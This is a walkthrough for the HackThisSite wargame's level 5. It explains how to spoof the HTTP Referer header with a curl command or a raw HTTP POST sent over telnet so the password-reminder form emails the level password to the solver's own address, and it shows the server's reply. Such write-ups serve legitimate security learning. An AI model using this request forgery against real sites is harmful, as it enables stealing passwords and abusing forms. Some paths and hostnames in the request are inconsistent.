Level 5: “smokehouse” Level 5
Sam has gotten wise to all the people who wrote their own forms to get the password. Rather
then actually learn the password, he decided to make his email program a little more secure.
This one is insidious. The thing that threw me was the wording above. In
actual fact this problem is almost identical to the last one, except you
need to fake your referrer URL. There are two obvious ways to do this.
The first is to use curl. This makes the problem ridiculously simple. Just
type

“curl --referer http://www.hackthissite.org/web/level5/index.php -d
to=your@emailaddress.com http://www.hackthissite.org/web/level5/level5.php”

into your favourite unix box with curl installed. I don’t have curl installed
on my machine, and if you’re reading this, it’s likely you don’t either, or
don’t know how to use it. So we’ll go for the second method: telnetting to
the webserver!!

This is actually a much more complicated method, since we’ll be talking
HTTP directly to the webserver – the advantage is that it’ll work anywhere
a telnet client is available, which is basically everywhere. I’ll save you the
laborious details of how most of this request was generated (I used the
unix “nc” netcat utility and a dummy form which connected to a special
port), and just give you the data to copy and paste.


POST /hack/level5/level5.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Referer: http://www.www.hackthissite.org/web/level5/index.php
Accept-Language: en-au
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461;
COME.TO/KEWN M8888888S!!!; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
Host: www.hackthissite.org:80
Content-Length: 24
Connection: Keep-Alive
Cache-Control: no-cache
to=your@emailaddress.com


The above needs a little bit of effort to make it work. First, change the
email address to your email address. Next, count the number of
characters (including the three for “to=”) and change the “Content-
Length” variable to that value.
Now, open up a telnet session to www.hackthissite.org on port 80 (this is
achieved by typing “telnet www.hackthissite.org 80” into your command
prompt on whatever operating system you are running)
As soon as it connects (you won’t see any data coming from the server, so
just give it a few seconds and assume its connected) copy and paste your
created request into your telnet session and press enter a few times.
If it worked, it should say somewhere in the returned text that the
password was sent. Something like this, then the connection being lost:


HTTP/1.0 200 OK
Date: Fri, 11 Jul 2003 05:10:06 GMT
Server: Apache/1.3.20 Sun Cobalt (Unix) Chili!Soft-ASP/3.6.2 mod_ssl/2.8.4
OpenS
SL/0.9.6b PHP/4.1.2 mod_auth_pam_external/0.1 FrontPage/4.0.4.3
mod_perl/1.25
X-Powered-By: PHP/4.1.2
Content-Type: text/html
X-Cache: MISS from bri-pr1.tpgi.com.au
Connection: close
Password reminder successfully sent.


After both these steps, check your email for the password!